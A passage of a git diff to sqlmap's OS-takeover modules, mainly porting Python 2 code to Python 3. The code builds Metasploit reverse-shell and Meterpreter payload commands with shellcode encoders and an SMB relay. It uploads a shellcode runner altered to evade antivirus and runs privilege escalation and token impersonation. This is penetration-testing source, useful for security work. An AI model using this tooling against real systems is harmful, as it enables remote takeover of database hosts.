(default)", "linux/x86/shell"), + 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), + } + } self._msfConnectionsList = { - "windows": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), - 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), - 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), - 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - }, - "linux": { - 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), - 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), - } - } + "windows": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), + 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), + 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), + 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + }, + "linux": { + 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), + 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), + } + } self._msfEncodersList = { - "windows": { - 1: ("No Encoder", "generic/none"), - 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), - 3: ("Alpha2 Alphanumeric Uppercase 
Encoder", "x86/alpha_upper"), - 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), - 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), - 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), - 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), - 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), - 9: ("Non-Alpha Encoder", "x86/nonalpha"), - 10: ("Non-Upper Encoder", "x86/nonupper"), - 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), - 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), - 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), - } - } + "windows": { + 1: ("No Encoder", "generic/none"), + 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), + 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), + 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), + 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), + 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), + 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), + 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), + 9: ("Non-Alpha Encoder", "x86/nonalpha"), + 10: ("Non-Upper Encoder", "x86/nonupper"), + 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), + 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), + 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), + } + } self._msfSMBPortsList = { - "windows": { - 1: ("139/TCP", "139"), - 2: ("445/TCP (default)", "445"), - } - } + "windows": { + 1: ("139/TCP", "139"), + 2: ("445/TCP (default)", "445"), + } + } self._portData = { - "bind": "remote port number", - "reverse": "local port number", - } + "bind": "remote port number", + "reverse": "local port number", + } def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): if Backend.isOs(OS.WINDOWS): @@ -148,19 +155,8 @@ def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): choice = readInput(message, default="%d" % default) - if not choice: - if lst: - choice = getUnicode(default, UNICODE_ENCODING) - else: - return default - - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - return self._skeletonSelection(msg, lst, maxValue, default) - - elif int(choice) > maxValue or int(choice) < 1: - logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue) - return self._skeletonSelection(msg, lst, maxValue, default) + if not choice or not isDigit(choice) or int(choice) > maxValue or int(choice) < 1: + choice = default choice = int(choice) @@ -177,7 +173,7 @@ def _selectEncoder(self, encode=True): # choose which encoder to use. 
When called from --os-pwn the encoder # is always x86/alpha_mixed - used for sys_bineval() and # shellcodeexec - if isinstance(encode, basestring): + if isinstance(encode, six.string_types): return encode elif encode: @@ -200,7 +196,7 @@ def _selectPayload(self): if Backend.isDbms(DBMS.MYSQL): debugMsg = "by default MySQL on Windows runs as SYSTEM " - debugMsg += "user, it is likely that the the VNC " + debugMsg += "user, it is likely that the VNC " debugMsg += "injection will be successful" logger.debug(debugMsg) @@ -210,7 +206,7 @@ def _selectPayload(self): warnMsg = "by default PostgreSQL on Windows runs as " warnMsg += "postgres user, it is unlikely that the VNC " warnMsg += "injection will be successful" - logger.warn(warnMsg) + logger.warning(warnMsg) elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): choose = True @@ -219,7 +215,7 @@ def _selectPayload(self): warnMsg += "successful because usually Microsoft SQL Server " warnMsg += "%s runs as Network Service " % Backend.getVersion() warnMsg += "or the Administrator is not logged in" - logger.warn(warnMsg) + logger.warning(warnMsg) if choose: message = "what do you want to do?\n" @@ -232,34 +228,31 @@ def _selectPayload(self): if not choice or choice == "2": _payloadStr = "windows/meterpreter" - break elif choice == "3": _payloadStr = "windows/shell" - break elif choice == "1": if Backend.isDbms(DBMS.PGSQL): - logger.warn("beware that the VNC injection might not work") - + logger.warning("beware that the VNC injection might not work") break elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): break - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") + elif not isDigit(choice): + logger.warning("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > 2: - logger.warn("invalid value, it must be 1 or 2") + logger.warning("invalid value, it must be 1 or 2") if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter": warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "") warnMsg += "with the Meterpreter payload. Falling back to " warnMsg += "reverse TCP" - logger.warn(warnMsg) + logger.warning(warnMsg) self.connectionStr = "reverse_tcp" @@ -272,7 +265,7 @@ def _selectPort(self): def _selectRhost(self): if self.connectionStr.startswith("bind"): - message = "what is the back-end DBMS address? [%s] " % self.remoteIP + message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP address = readInput(message, default=self.remoteIP) if not address: @@ -288,7 +281,7 @@ def _selectRhost(self): def _selectLhost(self): if self.connectionStr.startswith("reverse"): - message = "what is the local address? [%s] " % self.localIP + message = "what is the local address? 
[Enter for '%s' (detected)] " % self.localIP address = readInput(message, default=self.localIP) if not address: @@ -315,42 +308,80 @@ def _prepareIngredients(self, encode=True): self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) def _forgeMsfCliCmd(self, exitfunc="process"): - self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=%s" % exitfunc - self._cliCmd += " LPORT=%s" % self.portStr + if kb.oldMsf: + self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) + self._cliCmd += " EXITFUNC=%s" % exitfunc + self._cliCmd += " LPORT=%s" % self.portStr + + if self.connectionStr.startswith("bind"): + self._cliCmd += " RHOST=%s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += " LHOST=%s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr + if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": + self._cliCmd += " DisableCourtesyShell=true" + + self._cliCmd += " E" else: - raise SqlmapDataException("unexpected connection type") + self._cliCmd = "%s -L -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd += "; set EXITFUNC %s" % exitfunc + self._cliCmd += "; set LPORT %s" % self.portStr + + if self.connectionStr.startswith("bind"): + self._cliCmd += "; set RHOST %s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += "; set LHOST %s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": - self._cliCmd += " DisableCourtesyShell=true" + if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": + self._cliCmd += "; set DisableCourtesyShell true" - self._cliCmd += " E" + self._cliCmd += "; exploit'" def _forgeMsfCliCmdForSmbrelay(self): self._prepareIngredients(encode=False) - self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=thread" - self._cliCmd += " LPORT=%s" % self.portStr - self._cliCmd += " SRVHOST=%s" % self.lhostStr - self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() + if kb.oldMsf: + self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) + self._cliCmd += " EXITFUNC=thread" + self._cliCmd += " LPORT=%s" % self.portStr + self._cliCmd += " SRVHOST=%s" % self.lhostStr + self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() + + if self.connectionStr.startswith("bind"): + self._cliCmd += " RHOST=%s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += " LHOST=%s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr + self._cliCmd += " E" else: - raise SqlmapDataException("unexpected connection type") + self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) + self._cliCmd += "; set EXITFUNC thread" + self._cliCmd += "; set LPORT %s" % self.portStr + self._cliCmd += "; set SRVHOST %s" % self.lhostStr + self._cliCmd += "; set SRVPORT %s" % 
self._selectSMBPort() + + if self.connectionStr.startswith("bind"): + self._cliCmd += "; set RHOST %s" % self.rhostStr + elif self.connectionStr.startswith("reverse"): + self._cliCmd += "; set LHOST %s" % self.lhostStr + else: + raise SqlmapDataException("unexpected connection type") - self._cliCmd += " E" + self._cliCmd += "; exploit'" def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): - self._payloadCmd = "%s %s" % (self._msfPayload, self.payloadConnStr) + if kb.oldMsf: + self._payloadCmd = self._msfPayload + else: + self._payloadCmd = "%s -p" % self._msfVenom + + self._payloadCmd += " %s" % self.payloadConnStr self._payloadCmd += " EXITFUNC=%s" % exitfunc self._payloadCmd += " LPORT=%s" % self.portStr @@ -362,13 +393,24 @@ def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): if Backend.isOs(OS.LINUX) and conf.privEsc: self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true" - if extra == "BufferRegister=EAX": - self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) + if kb.oldMsf: + if extra == "BufferRegister=EAX": + self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) - if extra is not None: - self._payloadCmd += " %s" % extra + if extra is not None: + self._payloadCmd += " %s" % extra + else: + self._payloadCmd += " X > \"%s\"" % outFile else: - self._payloadCmd += " X > \"%s\"" % outFile + if extra == "BufferRegister=EAX": + self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format) + + if extra is not None: + self._payloadCmd += " %s" % extra + + self._payloadCmd += " > \"%s\"" % outFile + else: + self._payloadCmd += " -f exe > \"%s\"" % outFile def _runMsfCliSmbrelay(self): self._forgeMsfCliCmdForSmbrelay() @@ -378,7 +420,7 @@ def _runMsfCliSmbrelay(self): logger.info(infoMsg) logger.debug("executing local command: %s" % self._cliCmd) - self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) + self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) def _runMsfCli(self, exitfunc): self._forgeMsfCliCmd(exitfunc) @@ -388,7 +430,7 @@ def _runMsfCli(self, exitfunc): logger.info(infoMsg) logger.debug("executing local command: %s" % self._cliCmd) - self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) + self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) def _runMsfShellcodeRemote(self): infoMsg = "running Metasploit Framework shellcode " @@ -416,15 +458,18 @@ def _loadMetExtensions(self, proc, metSess): send_all(proc, "use espia\n") send_all(proc, "use incognito\n") - # This extension is loaded by default since Metasploit > 3.7 - #send_all(proc, "use priv\n") - # This extension freezes the connection on 64-bit systems - #send_all(proc, "use sniffer\n") + + # This extension is loaded by default since Metasploit > 3.7: + # send_all(proc, "use priv\n") + + # This extension freezes the connection on 64-bit systems: + # send_all(proc, "use sniffer\n") + send_all(proc, "sysinfo\n") send_all(proc, "getuid\n") if conf.privEsc: - print + print() infoMsg = "trying to escalate privileges using Meterpreter " infoMsg += "'getsystem' command which tries different " @@ -433,7 +478,7 @@ def _loadMetExtensions(self, proc, metSess): send_all(proc, "getsystem\n") - infoMsg = "displaying the list of Access Tokens availables. 
" + infoMsg = "displaying the list of available Access Tokens. " infoMsg += "Choose which user you want to impersonate by " infoMsg += "using incognito's command 'impersonate_token' if " infoMsg += "'getsystem' does not success to elevate privileges" @@ -443,8 +488,9 @@ def _loadMetExtensions(self, proc, metSess): send_all(proc, "getuid\n") def _controlMsfCmd(self, proc, func): + initialized = False + start_time = time.time() stdin_fd = sys.stdin.fileno() - initiated_properly = False while True: returncode = proc.poll() @@ -460,8 +506,8 @@ def _controlMsfCmd(self, proc, func): if IS_WIN: timeout = 3 - inp = "" - start_time = time.time() + inp = b"" + _ = time.time() while True: if msvcrt.kbhit(): @@ -472,64 +518,67 @@ def _controlMsfCmd(self, proc, func): elif ord(char) >= 32: # space_char inp += char - if len(inp) == 0 and (time.time() - start_time) > timeout: + if len(inp) == 0 and (time.time() - _) > timeout: break if len(inp) > 0: try: send_all(proc, inp) - except IOError: + except (EOFError, IOError): # Probably the child has exited pass else: - ready_fds = select([stdin_fd], [], [], 1) + ready_fds = select.select([stdin_fd], [], [], 1) if stdin_fd in ready_fds[0]: try: send_all(proc, blockingReadFromFD(stdin_fd)) - except IOError: + except (EOFError, IOError): # Probably the child has exited pass out = recv_some(proc, t=.1, e=0) - blockingWriteToFD(sys.stdout.fileno(), out) - - # Dirty hack to allow Metasploit integration to be tested - # in --live-test mode - if initiated_properly and conf.liveTest: - try: - send_all(proc, "exit\n") - except TypeError: - continue + blockingWriteToFD(sys.stdout.fileno(), getBytes(out)) # For --os-pwn and --os-bof pwnBofCond = self.connectionStr.startswith("reverse") - pwnBofCond &= "Starting the payload handler" in out + pwnBofCond &= any(_ in out for _ in (b"Starting the payload handler", b"Started reverse")) # For --os-smbrelay - smbRelayCond = "Server started" in out + smbRelayCond = b"Server started" in out if pwnBofCond or smbRelayCond: func() - if "Starting the payload handler" in out and "shell" in self.payloadStr: - if Backend.isOs(OS.WINDOWS): - send_all(proc, "whoami\n") - else: - send_all(proc, "uname -a ; id\n") + timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT - time.sleep(2) - initiated_properly = True + if not initialized: + match = re.search(b"Meterpreter session ([\\d]+) opened", out) - metSess = re.search("Meterpreter session ([\d]+) opened", out) + if match: + self._loadMetExtensions(proc, match.group(1)) - if metSess: - self._loadMetExtensions(proc, metSess.group(1)) + if "shell" in self.payloadStr: + send_all(proc, "whoami\n" if Backend.isOs(OS.WINDOWS) else "uname -a ; id\n") + time.sleep(2) - except EOFError: - returncode = proc.wait() + initialized = True + elif timeout: + proc.kill() + errMsg = "timeout occurred while attempting " + errMsg += "to open a remote session" + raise SqlmapGenericException(errMsg) - return returncode + except select.error as ex: + # Reference: https://github.com/andymccurdy/redis-py/pull/743/commits/2b59b25bb08ea09e98aede1b1f23a270fc085a9f + if ex.args[0] == errno.EINTR: + continue + else: + return proc.returncode + except (EOFError, IOError): + return proc.returncode + except KeyboardInterrupt: + pass def createMsfShellcode(self, exitfunc, format, extra, encode): infoMsg = "creating Metasploit Framework multi-stage shellcode " @@ -543,28 +592,28 @@ def createMsfShellcode(self, exitfunc, format, extra, encode): self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, 
extra) logger.debug("executing local command: %s" % self._payloadCmd) - process = execute(self._payloadCmd, shell=True, stdout=None, stderr=PIPE) + process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X")) pollProcess(process) payloadStderr = process.communicate()[1] - match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr) + match = re.search(b"(Total size:|Length:|succeeded with size|Final size of exe file:) ([\\d]+)", payloadStderr) if match: payloadSize = int(match.group(2)) if extra == "BufferRegister=EAX": - payloadSize = payloadSize / 2 + payloadSize = payloadSize // 2 debugMsg = "the shellcode size is %d bytes" % payloadSize logger.debug(debugMsg) else: - errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "") + errMsg = "failed to create the shellcode ('%s')" % getText(payloadStderr).replace("\n", " ").replace("\r", "") raise SqlmapFilePathException(errMsg) self._shellcodeFP = open(self._shellcodeFilePath, "rb") - self.shellcodeString = self._shellcodeFP.read() + self.shellcodeString = getText(self._shellcodeFP.read()) self._shellcodeFP.close() os.unlink(self._shellcodeFilePath) @@ -574,24 +623,40 @@ def uploadShellcodeexec(self, web=False): if Backend.isOs(OS.WINDOWS): self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") + content = decloak(self.shellcodeexecLocal) + if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: + content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, getBytes(randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER)))) + _ = cloak(data=content) + handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") + os.close(handle) + with open(self.shellcodeexecLocal, "w+b") as f: + f.write(_) else: self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") - if web: - self.shellcodeexecRemote = "%s/%s" % (self.webDirectory, __basename) - else: - self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) - + self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote)) logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote) if web: - self.webUpload(self.shellcodeexecRemote, self.webDirectory, filepath=self.shellcodeexecLocal) + written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal) + else: + written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) + + if written is not True: + errMsg = "there has been a problem uploading shellcodeexec. 
It " + errMsg += "looks like the binary file has not been written " + errMsg += "on the database underlying file system or an AV has " + errMsg += "flagged it as malicious and removed it" + logger.error(errMsg) + + return False else: - self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary") + logger.info("shellcodeexec successfully uploaded") + return True def pwn(self, goUdf=False): if goUdf: @@ -621,9 +686,9 @@ def smb(self): self._runMsfCliSmbrelay() if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self._randFile) + self.uncPath = r"\\\\%s\\%s" % (self.lhostStr, self._randFile) else: - self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self._randFile) + self.uncPath = r"\\%s\%s" % (self.lhostStr, self._randFile) debugMsg = "Metasploit Framework console exited with return " debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest) diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index 77491cd8bfc..5abec5fabc3 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -1,17 +1,19 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os +from lib.core.common import openFile from lib.core.common import randomStr from lib.core.data import conf from lib.core.data import logger +from lib.core.enums import REGISTRY_OPERATION -class Registry: +class Registry(object): """ This class defines methods to read and write Windows registry keys """ @@ -32,28 +34,28 @@ def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False): readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" self._batRead = ( - "@ECHO OFF\r\n", - readParse, - ) + "@ECHO OFF\r\n", + readParse, + ) self._batAdd = ( - "@ECHO OFF\r\n", - "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), - ) + "@ECHO OFF\r\n", + "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), + ) self._batDel = ( - "@ECHO OFF\r\n", - "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), - ) + "@ECHO OFF\r\n", + "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), + ) def _createLocalBatchFile(self): - self._batPathFp = open(self._batPathLocal, "w") + self._batPathFp = openFile(self._batPathLocal, "w") - if self._operation == "read": + if self._operation == REGISTRY_OPERATION.READ: lines = self._batRead - elif self._operation == "add": + elif self._operation == REGISTRY_OPERATION.ADD: lines = self._batAdd - elif self._operation == "delete": + elif self._operation == REGISTRY_OPERATION.DELETE: lines = self._batDel for line in lines: @@ -65,12 +67,12 @@ def _createRemoteBatchFile(self): logger.debug("creating batch file '%s'" % self._batPathRemote) self._createLocalBatchFile() - self.writeFile(self._batPathLocal, self._batPathRemote, "text") + self.writeFile(self._batPathLocal, self._batPathRemote, "text", forceCheck=True) os.unlink(self._batPathLocal) def readRegKey(self, regKey, regValue, parse=False): - self._operation = "read" + self._operation = REGISTRY_OPERATION.READ Registry._initVars(self, regKey, regValue, parse=parse) self._createRemoteBatchFile() @@ -90,7 +92,7 @@ def readRegKey(self, regKey, regValue, parse=False): return data def 
addRegKey(self, regKey, regValue, regType, regData): - self._operation = "add" + self._operation = REGISTRY_OPERATION.ADD Registry._initVars(self, regKey, regValue, regType, regData) self._createRemoteBatchFile() @@ -103,7 +105,7 @@ def addRegKey(self, regKey, regValue, regType, regData): self.delRemoteFile(self._batPathRemote) def delRegKey(self, regKey, regValue): - self._operation = "delete" + self._operation = REGISTRY_OPERATION.DELETE Registry._initVars(self, regKey, regValue) self._createRemoteBatchFile() diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index 8375f2a4d99..36192805ea5 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -1,26 +1,28 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os from lib.core.agent import agent -from lib.core.common import dataToStdout from lib.core.common import Backend -from lib.core.common import isTechniqueAvailable +from lib.core.common import checkFile +from lib.core.common import dataToStdout +from lib.core.common import isDigit +from lib.core.common import isStackingAvailable from lib.core.common import readInput +from lib.core.common import unArrayizeValue +from lib.core.compat import xrange from lib.core.data import conf from lib.core.data import logger from lib.core.data import queries -from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import OS -from lib.core.enums import PAYLOAD -from lib.core.common import unArrayizeValue from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapUnsupportedFeatureException @@ -28,7 +30,7 @@ from lib.core.unescaper import unescaper from lib.request import inject -class UDF: +class UDF(object): """ This class defines methods to deal with User-Defined Functions for plugins. @@ -42,12 +44,8 @@ def __init__(self): def _askOverwriteUdf(self, udf): message = "UDF '%s' already exists, do you " % udf message += "want to overwrite it? 
[y/N] " - output = readInput(message, default="N") - if output and output[0] in ("y", "Y"): - return True - else: - return False + return readInput(message, default='N', boolean=True) def _checkExistUdf(self, udf): logger.info("checking if UDF '%s' already exist" % udf) @@ -112,7 +110,7 @@ def udfEvalCmd(self, cmd, first=None, last=None, udfName=None): return output def udfCheckNeeded(self): - if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: + if (not any((conf.fileRead, conf.commonFiles)) or (any((conf.fileRead, conf.commonFiles)) and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: self.sysUdfs.pop("sys_fileread") if not conf.osPwn: @@ -132,7 +130,7 @@ def udfSetLocalPaths(self): errMsg = "udfSetLocalPaths() method must be defined within the plugin" raise SqlmapUnsupportedFeatureException(errMsg) - def udfCreateFromSharedLib(self, udf=None, inpRet=None): + def udfCreateFromSharedLib(self, udf, inpRet): errMsg = "udfCreateFromSharedLib() method must be defined within the plugin" raise SqlmapUnsupportedFeatureException(errMsg) @@ -147,6 +145,7 @@ def udfInjectCore(self, udfDict): if len(self.udfToCreate) > 0: self.udfSetRemotePath() + checkFile(self.udfLocalFile) written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True) if written is not True: @@ -157,12 +156,13 @@ def udfInjectCore(self, udfDict): message = "do you want to proceed anyway? Beware that the " message += "operating system takeover will fail [y/N] " - choice = readInput(message, default="N") - if choice and choice.lower() == "y": + if readInput(message, default='N', boolean=True): written = True else: return False + else: + return True for udf, inpRet in udfDict.items(): if udf in self.udfToCreate and udf not in self.createdUdf: @@ -188,7 +188,7 @@ def udfInjectCustom(self): logger.error(errMsg) return - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if not isStackingAvailable() and not conf.direct: errMsg = "UDF injection feature requires stacked queries SQL injection" logger.error(errMsg) return @@ -197,19 +197,19 @@ def udfInjectCustom(self): if not self.isDba(): warnMsg = "functionality requested probably does not work because " - warnMsg += "the curent session user is not a database administrator" - logger.warn(warnMsg) + warnMsg += "the current session user is not a database administrator" + logger.warning(warnMsg) if not conf.shLib: msg = "what is the local path of the shared library? " while True: - self.udfLocalFile = readInput(msg) + self.udfLocalFile = readInput(msg, default=None, checkBatch=False) if self.udfLocalFile: break else: - logger.warn("you need to specify the local path of the shared library") + logger.warning("you need to specify the local path of the shared library") else: self.udfLocalFile = conf.shLib @@ -238,9 +238,9 @@ def udfInjectCustom(self): msg += "from the shared library? " while True: - udfCount = readInput(msg, default=1) + udfCount = readInput(msg, default='1') - if isinstance(udfCount, basestring) and udfCount.isdigit(): + if udfCount.isdigit(): udfCount = int(udfCount) if udfCount <= 0: @@ -248,23 +248,19 @@ def udfInjectCustom(self): return else: break - - elif isinstance(udfCount, int): - break - else: - logger.warn("invalid value, only digits are allowed") + logger.warning("invalid value, only digits are allowed") - for x in range(0, udfCount): + for x in xrange(0, udfCount): while True: msg = "what is the name of the UDF number %d? 
" % (x + 1) - udfName = readInput(msg) + udfName = readInput(msg, default=None, checkBatch=False) if udfName: self.udfs[udfName] = {} break else: - logger.warn("you need to specify the name of the UDF") + logger.warning("you need to specify the name of the UDF") if Backend.isDbms(DBMS.MYSQL): defaultType = "string" @@ -273,32 +269,28 @@ def udfInjectCustom(self): self.udfs[udfName]["input"] = [] - default = 1 msg = "how many input parameters takes UDF " - msg += "'%s'? (default: %d) " % (udfName, default) + msg += "'%s'? (default: 1) " % udfName while True: - parCount = readInput(msg, default=default) + parCount = readInput(msg, default='1') - if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0: + if parCount.isdigit() and int(parCount) >= 0: parCount = int(parCount) break - elif isinstance(parCount, int): - break - else: - logger.warn("invalid value, only digits >= 0 are allowed") + logger.warning("invalid value, only digits >= 0 are allowed") - for y in range(0, parCount): + for y in xrange(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? (default: %s) " % ((y + 1), defaultType) while True: - parType = readInput(msg, default=defaultType) + parType = readInput(msg, default=defaultType).strip() - if isinstance(parType, basestring) and parType.isdigit(): - logger.warn("you need to specify the data-type of the parameter") + if parType.isdigit(): + logger.warning("you need to specify the data-type of the parameter") else: self.udfs[udfName]["input"].append(parType) @@ -310,8 +302,8 @@ def udfInjectCustom(self): while True: retType = readInput(msg, default=defaultType) - if isinstance(retType, basestring) and retType.isdigit(): - logger.warn("you need to specify the data-type of the return value") + if hasattr(retType, "isdigit") and retType.isdigit(): + logger.warning("you need to specify the data-type of the return value") else: self.udfs[udfName]["return"] = retType break @@ -324,12 +316,12 